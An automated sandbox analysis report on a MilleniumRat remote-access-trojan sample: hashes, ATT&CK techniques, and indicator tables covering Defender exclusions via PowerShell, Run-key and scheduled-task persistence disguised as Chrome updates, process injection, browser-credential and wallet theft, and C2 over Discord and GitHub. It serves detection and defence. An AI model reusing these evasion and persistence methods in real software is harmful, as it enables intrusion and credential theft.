milleniumrat | aa5f1188b6ee04b295860df6da0ee047395bd566508aa570249a07919cdf0db8

Analysis

max time kernel
150s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
12-06-2024 06:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.exe
Size

37.2MB
MD5

31125c6581ea8f49e9e42c6d9d6b8240
SHA1

a18eb575c3a1b8fa27de21603008c4e204eecd81
SHA256

aa5f1188b6ee04b295860df6da0ee047395bd566508aa570249a07919cdf0db8
SHA512

9a4c84d6ad4c547f614df3521e2fb0f4ad2b5c885b31aa0cd14d43abb48ef3f8c935e3b498c26e5f6a4262d6d37e867f5a4a3f41e32aa09477b61e64fb80ea75
SSDEEP

786432:8RQBrRSY+R46huYqwAO4YoMGD6Oafw2827HokWhSnuvluwhNnlxM:8ROrRR+R4WurwAO49QY2LtW0nuDhNnnM

Score

10^/10

milleniumrat discovery evasion execution persistence pyinstaller rat spyware stealer upx

Malware Config

Signatures

MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 1880 created 3316	1880	setup.exe	52
PID 1880 created 3316	1880	setup.exe	52
PID 1880 created 3316	1880	setup.exe	52
PID 1880 created 3316	1880	setup.exe	52
PID 1880 created 3316	1880	setup.exe	52
PID 1880 created 3316	1880	setup.exe	52
PID 7860 created 3316	7860	updater.exe	52
PID 7860 created 3316	7860	updater.exe	52
PID 7860 created 3316	7860	updater.exe	52
PID 7860 created 3316	7860	updater.exe	52
PID 7860 created 3316	7860	updater.exe	52
PID 7860 created 3316	7860	updater.exe	52

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3368	powershell.exe
3008	powershell.exe
4492	powershell.exe
6356	powershell.exe
4844	powershell.exe

Contacts a large (1250) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 13 IoCs

pid	Process
4380	Build.exe
2264	hacn.exe
1352	hacn.exe
2368	based.exe
1372	based.exe
4988	s.exe
4308	main.exe
3496	svchost.exe
1880	setup.exe
3632	svchost.exe
8048	rar.exe
5944	Update.exe
7860	updater.exe

Loads dropped DLL 51 IoCs

pid	Process
4092	main.exe
4092	main.exe
4092	main.exe
1352	hacn.exe
1352	hacn.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
1372	based.exe
4308	main.exe
1372	based.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
3632	svchost.exe
5944	Update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000100000002aa8d-54.dat	upx
behavioral2/memory/4092-57-0x00007FFC06710000-0x00007FFC06CFA000-memory.dmp	upx
behavioral2/files/0x000100000002aa5e-105.dat	upx
behavioral2/files/0x000100000002aa5d-104.dat	upx
behavioral2/files/0x000100000002aa5c-103.dat	upx
behavioral2/files/0x000100000002aa5b-102.dat	upx
behavioral2/files/0x000100000002aa5a-101.dat	upx
behavioral2/files/0x000100000002aa93-100.dat	upx
behavioral2/files/0x000100000002aa8e-99.dat	upx
behavioral2/files/0x000100000002aa8c-98.dat	upx
behavioral2/memory/1372-205-0x00007FFC05D20000-0x00007FFC0630A000-memory.dmp	upx
behavioral2/memory/1372-207-0x00007FFC219F0000-0x00007FFC219FF000-memory.dmp	upx
behavioral2/memory/1372-206-0x00007FFC183F0000-0x00007FFC18413000-memory.dmp	upx
behavioral2/memory/1372-229-0x00007FFC06600000-0x00007FFC0676F000-memory.dmp	upx
behavioral2/memory/1372-228-0x00007FFC133E0000-0x00007FFC13403000-memory.dmp	upx
behavioral2/memory/1372-226-0x00007FFC18100000-0x00007FFC1812D000-memory.dmp	upx
behavioral2/memory/1372-234-0x00007FFC17130000-0x00007FFC17149000-memory.dmp	upx
behavioral2/memory/1372-239-0x00007FFC063D0000-0x00007FFC06488000-memory.dmp	upx
behavioral2/memory/1372-240-0x00007FFC038D0000-0x00007FFC03C45000-memory.dmp	upx
behavioral2/memory/1372-237-0x00007FFC0DBD0000-0x00007FFC0DBFE000-memory.dmp	upx
behavioral2/memory/1372-310-0x00007FFC012A0000-0x00007FFC013BC000-memory.dmp	upx
behavioral2/memory/1372-249-0x00007FFC183E0000-0x00007FFC183ED000-memory.dmp	upx
behavioral2/memory/1372-248-0x00007FFC16BF0000-0x00007FFC16C04000-memory.dmp	upx
behavioral2/memory/1372-236-0x00007FFC1AFF0000-0x00007FFC1AFFD000-memory.dmp	upx
behavioral2/memory/1372-227-0x00007FFC1D730000-0x00007FFC1D749000-memory.dmp	upx
behavioral2/memory/1372-1904-0x00007FFC05D20000-0x00007FFC0630A000-memory.dmp	upx
behavioral2/memory/1372-1968-0x00007FFC183F0000-0x00007FFC18413000-memory.dmp	upx
behavioral2/memory/1372-1969-0x00007FFC06600000-0x00007FFC0676F000-memory.dmp	upx
behavioral2/memory/1372-2053-0x00007FFC133E0000-0x00007FFC13403000-memory.dmp	upx
behavioral2/memory/1372-2400-0x00007FFC17130000-0x00007FFC17149000-memory.dmp	upx
behavioral2/memory/1372-2447-0x00007FFC0DBD0000-0x00007FFC0DBFE000-memory.dmp	upx
behavioral2/memory/1372-2498-0x00007FFC038D0000-0x00007FFC03C45000-memory.dmp	upx
behavioral2/memory/1372-2497-0x00007FFC063D0000-0x00007FFC06488000-memory.dmp	upx
behavioral2/memory/1372-2535-0x00007FFC0DBD0000-0x00007FFC0DBFE000-memory.dmp	upx
behavioral2/memory/1372-2536-0x00007FFC06600000-0x00007FFC0676F000-memory.dmp	upx
behavioral2/memory/1372-2534-0x00007FFC038D0000-0x00007FFC03C45000-memory.dmp	upx
behavioral2/memory/1372-2529-0x00007FFC17130000-0x00007FFC17149000-memory.dmp	upx
behavioral2/memory/1372-2528-0x00007FFC063D0000-0x00007FFC06488000-memory.dmp	upx
behavioral2/memory/1372-2527-0x00007FFC133E0000-0x00007FFC13403000-memory.dmp	upx
behavioral2/memory/1372-2526-0x00007FFC1D730000-0x00007FFC1D749000-memory.dmp	upx
behavioral2/memory/1372-2525-0x00007FFC18100000-0x00007FFC1812D000-memory.dmp	upx
behavioral2/memory/1372-2524-0x00007FFC219F0000-0x00007FFC219FF000-memory.dmp	upx
behavioral2/memory/1372-2523-0x00007FFC183F0000-0x00007FFC18413000-memory.dmp	upx
behavioral2/memory/1372-2522-0x00007FFC05D20000-0x00007FFC0630A000-memory.dmp	upx
behavioral2/memory/1372-2549-0x00007FFC012A0000-0x00007FFC013BC000-memory.dmp	upx
behavioral2/memory/1372-2548-0x00007FFC183E0000-0x00007FFC183ED000-memory.dmp	upx
behavioral2/memory/1372-2547-0x00007FFC16BF0000-0x00007FFC16C04000-memory.dmp	upx
behavioral2/memory/1372-2546-0x00007FFC1AFF0000-0x00007FFC1AFFD000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com
54	discord.com
55	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
1	api.ipify.org
9	api.ipify.org

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3632	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1880 set thread context of 7180	1880	setup.exe	203
PID 7860 set thread context of 3636	7860	updater.exe	220
PID 7860 set thread context of 3124	7860	updater.exe	223
PID 7860 set thread context of 6800	7860	updater.exe	224

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4564	sc.exe
7028	sc.exe
7136	sc.exe
7184	sc.exe
7148	sc.exe
348	sc.exe
7112	sc.exe
4612	sc.exe
2280	sc.exe
1956	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000400000002aa05-113.dat	pyinstaller
behavioral2/files/0x000100000002aac1-232.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
6984	schtasks.exe
6972	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5596	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5728	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
3448	tasklist.exe
2600	tasklist.exe
3064	tasklist.exe
5144	tasklist.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1456	systeminfo.exe

Modifies data under HKEY_USERS 58 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718174295"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
6916	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3368	powershell.exe
3008	powershell.exe
3008	powershell.exe
3824	powershell.exe
3824	powershell.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4308	main.exe
4844	powershell.exe
4844	powershell.exe
3368	powershell.exe
3368	powershell.exe
4448	powershell.exe
4448	powershell.exe
4448	powershell.exe
4844	powershell.exe
3824	powershell.exe
3008	powershell.exe
7684	powershell.exe
7684	powershell.exe
2640	powershell.exe
2640	powershell.exe
5448	powershell.exe
5448	powershell.exe
5828	powershell.exe
5828	powershell.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
5944	Update.exe
1880	setup.exe
1880	setup.exe
4492	powershell.exe
4492	powershell.exe
1880	setup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4308	main.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	3448	tasklist.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	2600	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe
Token: SeSecurityPrivilege	4064	WMIC.exe
Token: SeTakeOwnershipPrivilege	4064	WMIC.exe
Token: SeLoadDriverPrivilege	4064	WMIC.exe
Token: SeSystemProfilePrivilege	4064	WMIC.exe
Token: SeSystemtimePrivilege	4064	WMIC.exe
Token: SeProfSingleProcessPrivilege	4064	WMIC.exe
Token: SeIncBasePriorityPrivilege	4064	WMIC.exe
Token: SeCreatePagefilePrivilege	4064	WMIC.exe
Token: SeBackupPrivilege	4064	WMIC.exe
Token: SeRestorePrivilege	4064	WMIC.exe
Token: SeShutdownPrivilege	4064	WMIC.exe
Token: SeDebugPrivilege	4064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4064	WMIC.exe
Token: SeRemoteShutdownPrivilege	4064	WMIC.exe
Token: SeUndockPrivilege	4064	WMIC.exe
Token: SeManageVolumePrivilege	4064	WMIC.exe
Token: 33	4064	WMIC.exe
Token: 34	4064	WMIC.exe
Token: 35	4064	WMIC.exe
Token: 36	4064	WMIC.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	3064	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe
Token: SeSecurityPrivilege	4064	WMIC.exe
Token: SeTakeOwnershipPrivilege	4064	WMIC.exe
Token: SeLoadDriverPrivilege	4064	WMIC.exe
Token: SeSystemProfilePrivilege	4064	WMIC.exe
Token: SeSystemtimePrivilege	4064	WMIC.exe
Token: SeProfSingleProcessPrivilege	4064	WMIC.exe
Token: SeIncBasePriorityPrivilege	4064	WMIC.exe
Token: SeCreatePagefilePrivilege	4064	WMIC.exe
Token: SeBackupPrivilege	4064	WMIC.exe
Token: SeRestorePrivilege	4064	WMIC.exe
Token: SeShutdownPrivilege	4064	WMIC.exe
Token: SeDebugPrivilege	4064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4064	WMIC.exe
Token: SeRemoteShutdownPrivilege	4064	WMIC.exe
Token: SeUndockPrivilege	4064	WMIC.exe
Token: SeManageVolumePrivilege	4064	WMIC.exe
Token: 33	4064	WMIC.exe
Token: 34	4064	WMIC.exe
Token: 35	4064	WMIC.exe
Token: 36	4064	WMIC.exe
Token: SeDebugPrivilege	7684	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeIncreaseQuotaPrivilege	2632	WMIC.exe
Token: SeSecurityPrivilege	2632	WMIC.exe
Token: SeTakeOwnershipPrivilege	2632	WMIC.exe
Token: SeLoadDriverPrivilege	2632	WMIC.exe
Token: SeSystemProfilePrivilege	2632	WMIC.exe
Token: SeSystemtimePrivilege	2632	WMIC.exe
Token: SeProfSingleProcessPrivilege	2632	WMIC.exe
Token: SeIncBasePriorityPrivilege	2632	WMIC.exe
Token: SeCreatePagefilePrivilege	2632	WMIC.exe
Token: SeBackupPrivilege	2632	WMIC.exe
Token: SeRestorePrivilege	2632	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5944	Update.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3316	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 4092	1956	main.exe	80
PID 1956 wrote to memory of 4092	1956	main.exe	80
PID 4092 wrote to memory of 4732	4092	main.exe	81
PID 4092 wrote to memory of 4732	4092	main.exe	81
PID 4732 wrote to memory of 4380	4732	cmd.exe	83
PID 4732 wrote to memory of 4380	4732	cmd.exe	83
PID 4732 wrote to memory of 4380	4732	cmd.exe	83
PID 4380 wrote to memory of 2264	4380	Build.exe	85
PID 4380 wrote to memory of 2264	4380	Build.exe	85
PID 2264 wrote to memory of 1352	2264	hacn.exe	89
PID 2264 wrote to memory of 1352	2264	hacn.exe	89
PID 4380 wrote to memory of 2368	4380	Build.exe	88
PID 4380 wrote to memory of 2368	4380	Build.exe	88
PID 1352 wrote to memory of 1092	1352	hacn.exe	90
PID 1352 wrote to memory of 1092	1352	hacn.exe	90
PID 2368 wrote to memory of 1372	2368	based.exe	92
PID 2368 wrote to memory of 1372	2368	based.exe	92
PID 1092 wrote to memory of 4988	1092	cmd.exe	93
PID 1092 wrote to memory of 4988	1092	cmd.exe	93
PID 1092 wrote to memory of 4988	1092	cmd.exe	93
PID 4988 wrote to memory of 4308	4988	s.exe	94
PID 4988 wrote to memory of 4308	4988	s.exe	94
PID 4988 wrote to memory of 3496	4988	s.exe	95
PID 4988 wrote to memory of 3496	4988	s.exe	95
PID 1372 wrote to memory of 4528	1372	based.exe	96
PID 1372 wrote to memory of 4528	1372	based.exe	96
PID 1372 wrote to memory of 4576	1372	based.exe	97
PID 1372 wrote to memory of 4576	1372	based.exe	97
PID 1372 wrote to memory of 336	1372	based.exe	101
PID 1372 wrote to memory of 336	1372	based.exe	101
PID 4988 wrote to memory of 1880	4988	s.exe	100
PID 4988 wrote to memory of 1880	4988	s.exe	100
PID 3496 wrote to memory of 3632	3496	svchost.exe	103
PID 3496 wrote to memory of 3632	3496	svchost.exe	103
PID 336 wrote to memory of 3368	336	cmd.exe	104
PID 336 wrote to memory of 3368	336	cmd.exe	104
PID 1372 wrote to memory of 1808	1372	based.exe	105
PID 1372 wrote to memory of 1808	1372	based.exe	105
PID 1372 wrote to memory of 2076	1372	based.exe	106
PID 1372 wrote to memory of 2076	1372	based.exe	106
PID 1372 wrote to memory of 1432	1372	based.exe	109
PID 1372 wrote to memory of 1432	1372	based.exe	109
PID 1372 wrote to memory of 4340	1372	based.exe	110
PID 1372 wrote to memory of 4340	1372	based.exe	110
PID 1372 wrote to memory of 4604	1372	based.exe	111
PID 1372 wrote to memory of 4604	1372	based.exe	111
PID 1372 wrote to memory of 3488	1372	based.exe	113
PID 1372 wrote to memory of 3488	1372	based.exe	113
PID 1372 wrote to memory of 1664	1372	based.exe	114
PID 1372 wrote to memory of 1664	1372	based.exe	114
PID 1372 wrote to memory of 4936	1372	based.exe	115
PID 1372 wrote to memory of 4936	1372	based.exe	115
PID 4576 wrote to memory of 3824	4576	cmd.exe	121
PID 4576 wrote to memory of 3824	4576	cmd.exe	121
PID 3632 wrote to memory of 4772	3632	svchost.exe	122
PID 3632 wrote to memory of 4772	3632	svchost.exe	122
PID 4528 wrote to memory of 3008	4528	cmd.exe	123
PID 4528 wrote to memory of 3008	4528	cmd.exe	123
PID 2076 wrote to memory of 3448	2076	cmd.exe	125
PID 2076 wrote to memory of 3448	2076	cmd.exe	125
PID 1372 wrote to memory of 3304	1372	based.exe	126
PID 1372 wrote to memory of 3304	1372	based.exe	126
PID 1808 wrote to memory of 2600	1808	cmd.exe	128
PID 1808 wrote to memory of 2600	1808	cmd.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:400

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1032

C:\Windows\System32\svchost.exe
